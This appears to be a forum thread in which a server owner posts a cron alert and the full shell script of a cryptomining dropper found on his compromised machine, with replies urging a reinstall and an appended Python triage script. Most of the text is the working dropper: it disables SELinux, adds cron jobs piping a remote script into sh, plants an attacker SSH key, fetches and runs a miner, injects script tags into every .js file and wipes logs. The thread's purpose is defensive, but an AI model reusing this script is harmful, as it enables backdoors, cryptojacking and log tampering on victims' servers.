The following command:

```
[root@azimiao ~]# systemctl start firewalld.service
You have new mail in /var/spool/mail/root
```

Then I went into the mail directory and looked at the contents of root:
```
From [email protected] Tue Nov 27 08:53:28 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by azimiao.localdomain (Postfix, from userid 0)
	id A091C2409; Tue, 27 Nov 2018 08:53:28 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <root@azimiao> url -fsSL xxxxxxxxxxx/shz.sh | sh
Content-Type: text/plain; charset=
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=50357>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <[email protected]>
Date: Tue, 27 Nov 2018 08:52:06 +0800 (CST)

sh: line 2: dev/null: No such file or directory
mv: cannot stat ‘/usr/bin/wget’: No such file or directory
mv: cannot stat ‘/usr/bin/curl’: No such file or directory
ok
chattr: No such file or directory while trying to stat REDIS0008ú
chattr: No such file or directory while trying to stat redis-ver^E4.0.2ú
chattr: No such file or directory while trying to stat redis-bits@ú^EctimeTl[ú^Hused-mem^Lú^Nrepl-stream-dbú^Grepl-id(da32fed1ca9684ea57cb075d10627ec992da4e86ú^Krepl-offsetú^Laof-preamble
chattr: No such file or directory while trying to stat ^Aa^Ab
```
I found a script there; clicking it downloads it. The script's contents are as follows:
```sh
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crOndir='/var/spool/cron/'"$USER"
cOnt=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
if [ -f "$oddir" ]
then
    pkill zjgw
    chattr -i /etc/shz.sh
    rm -f /etc/shz.sh
    chattr -i /tmp/shz.sh
    rm -f /tmp/shz.sh
    chattr -i /etc/gmbpr
    rm -f /etc/gmbpr
else
    echo "ok"
fi
if [ -f "$rtdir" ]
then
    echo "goto 1" >> /etc/gmbpr2
    chattr -i $cont
    if [ -f "$bbdir" ]
    then
        [[ $cOnt=~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    else
        [[ $cOnt=~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    fi
    mkdir /root/.ssh
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
    ps -fe|grep zigw |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /etc
        filesize=`ls -l zigw | awk '{ print $5 }'`
        file="/etc/zigw"
        if [ -f "$file" ]
        then
            if [ "$filesize" -ne "1467080" ]
            then
                chattr -i /etc/zigw
                rm -f zigw
                if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=10 -P /etc xxxxxxxxxx/zigw
                fi
            fi
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 10 xxxxxxxxxx > /etc/zigw
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=10 -P xxxxxxxxxx:43768/zigw
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw
            fi
        fi
        chmod 777 zigw
        sleep 1s
        ./zigw
    else
        echo "runing....."
    fi
    chmod 777 /etc/zigw
    chattr +i /etc/zigw
    chmod 777 /etc/shz.sh
    chattr +i /etc/shz.sh
    shdir='/etc/shz.sh'
    if [ -f "$shdir" ]
    then
        echo "exists shell"
    else
        if [ -f "$bbdir" ]
        then
            curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
        elif [ -f "$bbdira" ]
        then
            url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh
        elif [ -f "$ccdir" ]
        then
            wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
        elif [ -f "$ccdira" ]
        then
            get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh
        fi
        sh /etc/shz.sh
    fi
else
    echo "goto 1" > /tmp/gmbpr2
    chattr -i $cont
    if [ -f "$bbdir" ]
    then
        [[ $cOnt=~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    else
        [[ $cOnt=~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir}
    fi
    ps -fe|grep zigw |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /tmp
        filesize=`ls -l zigw | awk '{ print $5 }'`
        file="/tmp/zigw"
        if [ -f "$file" ]
        then
            if [ "$filesize" -ne "1467080" ]
            then
                chattr -i /tmp/zigw
                rm -f zigw
                if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
                fi
            fi
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw
            fi
        fi
        chmod 777 zigw
        sleep 1s
        ./zigw
    else
        echo "runing....."
    fi
    chmod 777 /tmp/zigw
    chattr +i /tmp/zigw
    chmod 777 /tmp/shz.sh
    chattr +i /tmp/shz.sh
    shdir='/tmp/shz.sh'
    if [ -f "$shdir" ]
    then
        echo "exists shell"
    else
        if [ -f "$bbdir" ]
        then
            curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
        elif [ -f "$bbdira" ]
        then
            url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh
        elif [ -f "$ccdir" ]
        then
            wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/shz.sh
        elif [ -f "$ccdira" ]
        then
            get --timeout=10 --tries=10 -P /tmp xxxxxxxxxxm:43768/shz.sh
        fi
        sh /tmp/shz.sh
    fi
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 14444 -j DROP
iptables-save
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"xxxxxxxxxxxxxxx"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
echo > /var/spool/mail/root
```
(When posting, the forum said short URLs are not allowed, which is baffling, so I replaced them with xxx.)
1  337136897 (OP)  Why hasn't anyone knowledgeable replied? Bumping = =
2  merlin852  2018-11-27 10:59:09 +08:00  Zombie box +1. Format it and reinstall the system.
3  Greenm  2018-11-27 11:09:41 +08:00  Check whether your /root/.ssh/authorized_keys contains anyone else's strange public key; if it does, someone most likely wrote it in. Clean it up. Also check which ports are open, figure out how they got in, and plug the hole.
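A triage check for the persistence this script installs (a cron line piping a download into sh, the added authorized_keys entry, chattr +i on the dropped files, and the renamed curl/wget), as an added example that is not part of this thread. It works on text you pass in rather than reading the live system, so it runs offline; the sample inputs are constructed to mirror what the post shows, and the trusted key comment ops@laptop is assumed.

```python
import re

# Marker the dropper itself greps for in authorized_keys (a substring of its key).
KEY_MARKER = "xvsRtqHLMWoh"
# Cron entries that fetch a remote script and pipe it straight into a shell
# (curl/wget, or the renamed copies url/get that the script creates).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget|url|get)\b.*\|\s*(sh|bash)\b")
# Paths the script drops or renames, all taken from the script in the thread.
DROPPED = {"/etc/shz.sh", "/tmp/shz.sh", "/etc/zigw", "/tmp/zigw",
           "/etc/gmbpr", "/etc/gmbpr2", "/usr/bin/url", "/usr/bin/get"}

def suspicious_cron(crontab_text):
    """Cron lines that pipe a download into sh: the persistence the script adds."""
    return [ln.strip() for ln in crontab_text.splitlines() if PIPE_TO_SHELL.search(ln)]

def foreign_keys(authorized_keys_text, trusted_comments):
    """Keys whose comment is not in the admin's trusted set, or that carry the marker."""
    hits = []
    for ln in authorized_keys_text.splitlines():
        parts = ln.split()
        if len(parts) < 2 or ln.lstrip().startswith("#"):
            continue
        comment = parts[2] if len(parts) > 2 else ""
        if KEY_MARKER in parts[1] or comment not in trusted_comments:
            hits.append(comment or parts[1][:16])
    return hits

def immutable_files(lsattr_text):
    """Paths flagged +i in `lsattr` output; these need chattr -i before rm works."""
    out = []
    for ln in lsattr_text.splitlines():
        parts = ln.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            out.append(parts[1].strip())
    return out

def triage(crontab_text, keys_text, trusted_comments, lsattr_text, present_paths):
    """Collect every indicator into one report; present_paths is what exists on disk."""
    return {"cron": suspicious_cron(crontab_text),
            "keys": foreign_keys(keys_text, trusted_comments),
            "immutable": immutable_files(lsattr_text),
            "artifacts": sorted(DROPPED & set(present_paths))}

# Constructed sample inputs mirroring the thread (not real captures).
SAMPLE_CRON = "0 3 * * * /usr/local/bin/backup.sh\n*/12 * * * * url -fsSL http://xxx:43768/shz.sh | sh\n"
SAMPLE_KEYS = ("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC...xvsRtqHLMWoh... Administrator@Guess_me\n"
               "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA ops@laptop\n")
SAMPLE_LSATTR = "----i--------e-- /etc/shz.sh\n--------------e-- /etc/hosts\n"
SAMPLE_PRESENT = ["/etc/hosts", "/usr/bin/url", "/etc/gmbpr2"]

if __name__ == "__main__":
    print(triage(SAMPLE_CRON, SAMPLE_KEYS, {"ops@laptop"}, SAMPLE_LSATTR, SAMPLE_PRESENT))
```

On a real host the inputs come from `crontab -l` / `/var/spool/cron/root`, `/root/.ssh/authorized_keys`, `lsattr -R /etc /tmp /usr/bin`, and `os.path.exists` over DROPPED.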